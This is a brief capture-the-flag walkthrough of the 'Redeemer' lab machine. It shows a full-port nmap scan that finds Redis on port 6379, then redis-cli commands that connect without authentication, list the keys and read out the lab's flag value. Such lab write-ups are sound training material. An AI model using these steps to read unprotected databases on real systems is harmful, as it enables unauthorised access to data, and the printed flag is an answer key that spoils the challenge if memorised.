Redeemer

Port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon redeemer.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
Tech me some wins S4dbrd

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 14:05 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:05
Completed NSE at 14:05, 0.00s elapsed
Initiating Ping Scan at 14:05
Scanning redeemer.htb (10.129.254.60) [4 ports]
Completed Ping Scan at 14:05, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:05
Scanning redeemer.htb (10.129.254.60) [65535 ports]
Discovered open port 6379/tcp on 10.129.254.60
Completed SYN Stealth Scan at 14:06, 15.13s elapsed (65535 total ports)
NSE: Script scanning 10.129.254.60.
Initiating NSE at 14:06
Completed NSE at 14:06, 0.00s elapsed
Nmap scan report for redeemer.htb (10.129.254.60)
Host is up (0.078s latency).
Not shown: 65322 closed tcp ports (reset), 212 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
6379/tcp open  redis

NSE: Script Post-scanning.
Initiating NSE at 14:06
Completed NSE at 14:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.50 seconds
           Raw packets sent: 75251 (3.311MB) | Rcvd: 72960 (2.918MB)

recon reports redis service on port 6379

┌──(root@ghost)-[/home/ghost]
└─# redis-cli -h redeemer.htb -p 6379
redeemer.htb:6379> info keyspace
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
redeemer.htb:6379> keys *
1) "numb"
2) "flag"
3) "temp"
4) "stor"
redeemer.htb:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"